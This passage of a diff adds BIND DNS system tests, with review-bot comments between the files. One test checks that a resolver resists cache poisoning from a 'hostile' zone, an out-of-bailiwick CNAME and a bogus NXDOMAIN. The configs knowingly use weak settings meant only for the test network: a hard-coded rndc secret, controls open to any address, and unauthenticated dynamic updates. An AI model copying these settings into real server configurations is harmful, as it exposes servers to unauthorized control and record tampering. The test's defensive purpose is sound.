+ file "forgery.db";
+ allow-query { any; };
+};
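Review bot: In pending/ns2/named.conf.in, `allow-update { 10.53.0.0/16; };` on zone `example.com` authorizes dynamic updates by source address alone, with no TSIG key, and the file has no comment marking that as a test-only shortcut. An address-only update ACL gives no cryptographic assurance of who sent the update, so this stanza should not be copied into a real configuration as it stands. I would add `/* test fixture: unsigned updates accepted from the system-test addresses; use a key-based update-policy anywhere else */` above the line. The /16 also looks wider than the 10.53.0.x addresses the servers in this test listen on, so `10.53.0.0/24` may be enough; that depends on which source address nsupdate uses and should be confirmed.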
diff --git a/bin/tests/system/pending/ns2/sign.sh b/bin/tests/system/pending/ns2/sign.sh
new file mode 100644
index 0000000..df408f8
--- /dev/null
+++ b/bin/tests/system/pending/ns2/sign.sh
@@ -0,0 +1,34 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+for domain in example example.com; do
+ zone=${domain}.
+ infile=${domain}.db.in
+ zonefile=${domain}.db
+
+ keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone)
+ keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone)
+
+ cat $infile $keyname1.key $keyname2.key > $zonefile
+
+ $SIGNER -3 bebe -o $zone $zonefile > /dev/null
+done
+
+# remove "removed" record from example.com, causing the server to
+# send an apparently-invalid NXDOMAIN
+sed '/^removed/d' example.com.db.signed > example.com.db.new
+rm -f example.com.db.signed
+mv example.com.db.new example.com.db.signed
diff --git a/bin/tests/system/pending/ns3/hostile.db b/bin/tests/system/pending/ns3/hostile.db
new file mode 100644
index 0000000..a199922
--- /dev/null
+++ b/bin/tests/system/pending/ns3/hostile.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30
+@ IN SOA mname1. . (
+ 2009110500 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns3
+ MX 10 mail.example.
+ns3 A 10.53.0.3
diff --git a/bin/tests/system/pending/ns3/mail.example.db b/bin/tests/system/pending/ns3/mail.example.db
new file mode 100644
index 0000000..77eb731
--- /dev/null
+++ b/bin/tests/system/pending/ns3/mail.example.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 30
+@ IN SOA mname1. . (
+ 2009110300 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ NS ns3
+ns3 A 10.53.0.3
+;mail A 10.0.0.2 // the correct record
+@ A 10.0.0.3
diff --git a/bin/tests/system/pending/ns3/named.conf.in b/bin/tests/system/pending/ns3/named.conf.in
new file mode 100644
index 0000000..29afd19
--- /dev/null
+++ b/bin/tests/system/pending/ns3/named.conf.in
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+include "trusted.conf";
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "mail.example" {
+ type primary;
+ file "mail.example.db";
+};
+
+zone "hostile" {
+ type primary;
+ file "hostile.db";
+};
diff --git a/bin/tests/system/pending/ns4/named.conf.in b/bin/tests/system/pending/ns4/named.conf.in
new file mode 100644
index 0000000..6be9085
--- /dev/null
+++ b/bin/tests/system/pending/ns4/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "trusted.conf";
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
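Review bot: The banner comment `// NS2` at the top of pending/ns3/named.conf.in names the wrong server, since every address in the file is 10.53.0.3 and the file lives under ns3. It should read `// NS3`. It would also help to extend it to say what this server is for, e.g. `// NS3: serves the "hostile" zone and a conflicting mail.example zone (A 10.0.0.3)`, because the purpose of those two zones can currently only be worked out from the zone files.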
diff --git a/bin/tests/system/pending/setup.sh b/bin/tests/system/pending/setup.sh
new file mode 100644
index 0000000..2d52f1c
--- /dev/null
+++ b/bin/tests/system/pending/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+cd ns1 && $SHELL -e sign.sh
diff --git a/bin/tests/system/pending/tests.sh b/bin/tests/system/pending/tests.sh
new file mode 100644
index 0000000..049172f
--- /dev/null
+++ b/bin/tests/system/pending/tests.sh
@@ -0,0 +1,199 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# replace_data dname RR old_data new_data +replace_data() +{ + if [ $# -ne 4 ]; then + echo_i "unexpected input for replace_data" + return 1 + fi + + _dname=$1 + _rr=$2 + _olddata=$3 + _newdata=$4 + + _ret=0 + $NSUPDATE -d <<END >> nsupdate.out.test 2>&1 || _ret=1 +server 10.53.0.2 ${PORT} +update delete ${_dname} 30 ${_rr} ${_olddata} +update add ${_dname} 30 ${_rr} ${_newdata} +send +END + + if [ $_ret != 0 ]; then + echo_i "failed to update the test data" + return 1 + fi + + return 0 +} + +status=0 +n=0 + +DIGOPTS="+short +tcp -p ${PORT}" +DIGOPTS_CD="$DIGOPTS +cd" + +echo_i "Priming cache." +ret=0 +expect="10 mail.example." +ans=`$DIG $DIGOPTS_CD @10.53.0.4 hostile MX` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Checking that bogus additional is not returned with +CD." +ret=0 +expect="10.0.0.2" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 mail.example A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Prime cache with pending additional records. These should not be promoted +# to answer. +# +echo_i "Priming cache (pending additional A and AAAA)" +ret=0 +expect="10 mail.example.com." 
+ans=`$DIG $DIGOPTS @10.53.0.4 example.com MX` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Replacing pending A" +ret=0 +replace_data mail.example.com. A 192.0.2.2 192.0.2.3 || ret=1 +status=`expr $status + $ret` + +echo_i "Replacing pending AAAA" +ret=0 +replace_data mail.example.com. AAAA 2001:db8::2 2001:db8::3 || ret=1 +status=`expr $status + $ret` + +echo_i "Checking updated data to be returned (without CD)" +ret=0 +expect="192.0.2.3" +ans=`$DIG $DIGOPTS @10.53.0.4 mail.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Checking updated data to be returned (with CD)" +ret=0 +expect="2001:db8::3" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 mail.example.com AAAA` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Prime cache with a pending answer record. It can be returned (without +# validation) with +CD. +# +echo_i "Priming cache (pending answer)" +ret=0 +expect="192.0.2.2" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 pending-ok.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Replacing pending data" +ret=0 +replace_data pending-ok.example.com. A 192.0.2.2 192.0.2.3 || ret=1 +status=`expr $status + $ret` + +echo_i "Confirming cached pending data to be returned with CD" +ret=0 +expect="192.0.2.2" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 pending-ok.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Prime cache with a pending answer record. It should not be returned +# to no-DNSSEC clients. 
+# +echo_i "Priming cache (pending answer)" +ret=0 +expect="192.0.2.102" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 pending-ng.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Replacing pending data" +ret=0 +replace_data pending-ng.example.com. A 192.0.2.102 192.0.2.103 || ret=1 +status=`expr $status + $ret` + +echo_i "Confirming updated data returned, not the cached one, without CD" +ret=0 +expect="192.0.2.103" +ans=`$DIG $DIGOPTS @10.53.0.4 pending-ng.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Try to fool the resolver with an out-of-bailiwick CNAME +# +echo_i "Trying to Prime out-of-bailiwick pending answer with CD" +ret=0 +expect="10.10.10.10" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 bad.example. A` || ret=1 +ans=`echo $ans | awk '{print $NF}'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Confirming the out-of-bailiwick answer is not cached or reused with CD" +ret=0 +expect="10.10.10.10" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 nice.good. A` || ret=1 +ans=`echo $ans | awk '{print $NF}'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Make sure the resolver doesn't cache bogus NXDOMAIN +# +echo_i "Trying to Prime bogus NXDOMAIN" +ret=0 +expect="SERVFAIL" +ans=`$DIG +tcp -p ${PORT} @10.53.0.4 removed.example.com. A` || ret=1 +ans=`echo $ans | sed 's/^.*status: \([A-Z][A-Z]*\).*$/\1/'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Confirming the bogus NXDOMAIN was not cached" +ret=0 +expect="SERVFAIL" +ans=`$DIG +tcp -p ${PORT} @10.53.0.4 removed.example.com. 
A` || ret=1 +ans=`echo $ans | sed 's/^.*status: \([A-Z][A-Z]*\).*$/\1/'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/pipelined/Makefile.in b/bin/tests/system/pipelined/Makefile.in new file mode 100644 index 0000000..fe88628 --- /dev/null +++ b/bin/tests/system/pipelined/Makefile.in @@ -0,0 +1,49 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \ + ${OPENSSL_CFLAGS} + +CDEFINES = +CWARNINGS = + +DNSLIBS = ../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@ +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = ../../../../lib/dns/libdns.@A@ +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS} + +LIBS = ${DNSLIBS} ${ISCLIBS} @LIBS@ + +TARGETS = pipequeries@EXEEXT@ + +SRCS = pipequeries.c + +@BIND9_MAKE_RULES@ + +all: pipequeries@EXEEXT@ + +pipequeries@EXEEXT@: pipequeries.@O@ ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ pipequeries.@O@ ${LIBS} + +clean distclean:: + rm -f ${TARGETS} + diff --git a/bin/tests/system/pipelined/ans5/ans.py b/bin/tests/system/pipelined/ans5/ans.py new file mode 100644 index 0000000..bac5ed3 --- /dev/null +++ b/bin/tests/system/pipelined/ans5/ans.py 
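Review bot: `n=0` is initialised near the top of pending/tests.sh but never incremented or printed, so the checks are unnumbered and a failure message only says "failed, got ... expected ..." without identifying the step; two steps even share the text "Priming cache (pending answer)". Since these checks guard cache-poisoning behaviour (pending data, out-of-bailiwick CNAME, bogus NXDOMAIN), I would number each step, e.g. increment `n` before every check and end each message with `($n)`. Writing the dig output to a per-step file such as `dig.out.test$n` instead of only a shell variable would also leave the full response available when a check fails.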
@@ -0,0 +1,212 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +############################################################################ +# +# This tool acts as a TCP/UDP proxy and delays all incoming packets by 500 +# milliseconds. +# +# We use it to check pipelining - a client sents 8 questions over a +# pipelined connection - that require asking a normal (examplea) and a +# slow-responding (exampleb) servers: +# a.examplea +# a.exampleb +# b.examplea +# b.exampleb +# c.examplea +# c.exampleb +# d.examplea +# d.exampleb +# +# If pipelining works properly the answers will be returned out of order +# with all answers from examplea returned first, and then all answers +# from exampleb. +# +############################################################################ + +from __future__ import print_function + +import datetime +import os +import select +import signal +import socket +import sys +import time +import threading +import struct + +DELAY = 0.5 +THREADS = [] + + +def log(msg): + print(datetime.datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f ") + msg) + + +def sigterm(*_): + log("SIGTERM received, shutting down") + for thread in THREADS: + thread.close() + thread.join() + os.remove("ans.pid") + sys.exit(0) + + +class TCPDelayer(threading.Thread): + """For a given TCP connection conn we open a connection to (ip, port), + and then we delay each incoming packet by DELAY by putting it in a + queue. + In the pipelined test TCP should not be used, but it's here for + completnes. 
+ """ + + def __init__(self, conn, ip, port): + threading.Thread.__init__(self) + self.conn = conn + self.cconn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.cconn.connect((ip, port)) + self.queue = [] + self.running = True + + def close(self): + self.running = False + + def run(self): + while self.running: + curr_timeout = 0.5 + try: + curr_timeout = self.queue[0][0] - time.time() + except StopIteration: + pass + if curr_timeout > 0: + if curr_timeout == 0: + curr_timeout = 0.5 + rfds, _, _ = select.select( + [self.conn, self.cconn], [], [], curr_timeout + ) + if self.conn in rfds: + data = self.conn.recv(65535) + if not data: + return + self.queue.append((time.time() + DELAY, data)) + if self.cconn in rfds: + data = self.cconn.recv(65535) + if not data == 0: + return + self.conn.send(data) + try: + while self.queue[0][0] - time.time() < 0: + _, data = self.queue.pop(0) + self.cconn.send(data) + except StopIteration: + pass + + +class UDPDelayer(threading.Thread): + """Every incoming UDP packet is put in a queue for DELAY time, then + it's sent to (ip, port). We remember the query id to send the + response we get to a proper source, responses are not delayed. 
+ """ + + def __init__(self, usock, ip, port): + threading.Thread.__init__(self) + self.sock = usock + self.csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self.dst = (ip, port) + self.queue = [] + self.qid_mapping = {} + self.running = True + + def close(self): + self.running = False + + def run(self): + while self.running: + curr_timeout = 0.5 + if self.queue: + curr_timeout = self.queue[0][0] - time.time() + if curr_timeout >= 0: + if curr_timeout == 0: + curr_timeout = 0.5 + rfds, _, _ = select.select( + [self.sock, self.csock], [], [], curr_timeout + ) + if self.sock in rfds: + data, addr = self.sock.recvfrom(65535) + if not data: + return + self.queue.append((time.time() + DELAY, data)) + qid = struct.unpack(">H", data[:2])[0] + log("Received a query from %s, queryid %d" % (str(addr), qid)) + self.qid_mapping[qid] = addr + if self.csock in rfds: + data, addr = self.csock.recvfrom(65535) + if not data: + return + qid = struct.unpack(">H", data[:2])[0] + dst = self.qid_mapping.get(qid) + if dst is not None: + self.sock.sendto(data, dst) + log( + "Received a response from %s, queryid %d, sending to %s" + % (str(addr), qid, str(dst)) + ) + while self.queue and self.queue[0][0] - time.time() < 0: + _, data = self.queue.pop(0) + qid = struct.unpack(">H", data[:2])[0] + log("Sending a query to %s, queryid %d" % (str(self.dst), qid)) + self.csock.sendto(data, self.dst) + + +def main(): + signal.signal(signal.SIGTERM, sigterm) + signal.signal(signal.SIGINT, sigterm) + + with open("ans.pid", "w") as pidfile: + print(os.getpid(), file=pidfile) + + listenip = "10.53.0.5" + serverip = "10.53.0.2" + + try: + port = int(os.environ["PORT"]) + except KeyError: + port = 5300 + + log("Listening on %s:%d" % (listenip, port)) + + usock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + usock.bind((listenip, port)) + thread = UDPDelayer(usock, serverip, port) + thread.start() + THREADS.append(thread) + + 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind((listenip, port)) + sock.listen(1) + sock.settimeout(1) + + while True: + try: + (clientsock, _) = sock.accept() + log("Accepted connection from %s" % clientsock) + thread = TCPDelayer(clientsock, serverip, port) + thread.start() + THREADS.append(thread) + except socket.timeout: + pass + + +if __name__ == "__main__": + main() diff --git a/bin/tests/system/pipelined/clean.sh b/bin/tests/system/pipelined/clean.sh new file mode 100644 index 0000000..12c1733 --- /dev/null +++ b/bin/tests/system/pipelined/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f raw* output* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/pipelined/input b/bin/tests/system/pipelined/input new file mode 100644 index 0000000..485cf81 --- /dev/null +++ b/bin/tests/system/pipelined/input @@ -0,0 +1,8 @@ +a.examplea +a.exampleb +b.examplea +b.exampleb +c.examplea +c.exampleb +d.examplea +d.exampleb diff --git a/bin/tests/system/pipelined/inputb b/bin/tests/system/pipelined/inputb new file mode 100644 index 0000000..6ea367e --- /dev/null +++ b/bin/tests/system/pipelined/inputb @@ -0,0 +1,8 @@ +e.examplea +e.exampleb +f.examplea +f.exampleb +g.examplea +g.exampleb +h.examplea +h.exampleb diff --git a/bin/tests/system/pipelined/ns1/named.conf.in b/bin/tests/system/pipelined/ns1/named.conf.in new file mode 100644 index 0000000..848a022 --- /dev/null 
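Review bot: In `TCPDelayer.run` both `except StopIteration:` handlers are dead, because indexing the empty `self.queue` raises IndexError, so the thread dies on its first pass; they should read `except IndexError:`, or use the `if self.queue:` guard that `UDPDelayer.run` already has. In the same method `if not data == 0:` is true for every bytes value, so the relay returns as soon as the upstream socket delivers anything; `if not data:` matches the other recv checks. `UDPDelayer.run` unpacks `data[:2]` without a length check, so a datagram shorter than two bytes raises struct.error and ends the delayer thread; `if len(data) < 2: continue` would keep it running. The class docstring says the TCP path is not used by this test, which is probably why the first two went unnoticed.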
+++ b/bin/tests/system/pipelined/ns1/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/pipelined/ns1/root.db b/bin/tests/system/pipelined/ns1/root.db
new file mode 100644
index 0000000..f2819a1
--- /dev/null
+++ b/bin/tests/system/pipelined/ns1/root.db
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+examplea. NS ns2.examplea.
+ns2.examplea. A 10.53.0.5
+
+exampleb. NS ns3.exampleb.
+ns3.exampleb. A 10.53.0.3
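Review bot: The `rndc_key` block hard-codes the secret `1234abcd8765` and the `controls` statement accepts it from `allow { any; }`, with no comment saying this is a fixture; the same key and ACL recur in the ns2, ns3 and ns4 configs of this test. ns2 and ns3 additionally set `allow-update { any; };` on their zones, although nothing in this test's tests.sh appears to send a dynamic update. That is workable for servers bound to the 10.53.0.x test addresses, but these files are easy to copy as templates. I would add a comment above the key such as `/* Test-only rndc key shared by the system tests; never reuse outside the test network. */`, consider narrowing the control ACL to the test addresses, and drop `allow-update` where it is unused.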
diff --git a/bin/tests/system/pipelined/ns2/examplea.db b/bin/tests/system/pipelined/ns2/examplea.db
new file mode 100644
index 0000000..1be2d11
--- /dev/null
+++ b/bin/tests/system/pipelined/ns2/examplea.db
@@ -0,0 +1,32 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+examplea IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+examplea. NS ns2.examplea.
+ns2.examplea. A 10.53.0.5
+
+$ORIGIN examplea.
+a A 10.0.1.1
+b A 10.0.1.2
+c A 10.0.1.3
+d A 10.0.1.4
+e A 10.0.1.5
+f A 10.0.1.6
+g A 10.0.1.7
+h A 10.0.1.8
diff --git a/bin/tests/system/pipelined/ns2/named.conf.in b/bin/tests/system/pipelined/ns2/named.conf.in
new file mode 100644
index 0000000..40ed7b9
--- /dev/null
+++ b/bin/tests/system/pipelined/ns2/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "examplea" {
+ type primary;
+ file "examplea.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/pipelined/ns3/exampleb.db b/bin/tests/system/pipelined/ns3/exampleb.db
new file mode 100644
index 0000000..91b94c3
--- /dev/null
+++ b/bin/tests/system/pipelined/ns3/exampleb.db
@@ -0,0 +1,32 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+exampleb IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+exampleb. NS ns3.exampleb.
+ns3.exampleb. A 10.53.0.3
+
+$ORIGIN exampleb.
+a A 10.0.2.1
+b A 10.0.2.2
+c A 10.0.2.3
+d A 10.0.2.4
+e A 10.0.2.5
+f A 10.0.2.6
+g A 10.0.2.7
+h A 10.0.2.8
diff --git a/bin/tests/system/pipelined/ns3/named.conf.in b/bin/tests/system/pipelined/ns3/named.conf.in
new file mode 100644
index 0000000..428da7d
--- /dev/null
+++ b/bin/tests/system/pipelined/ns3/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
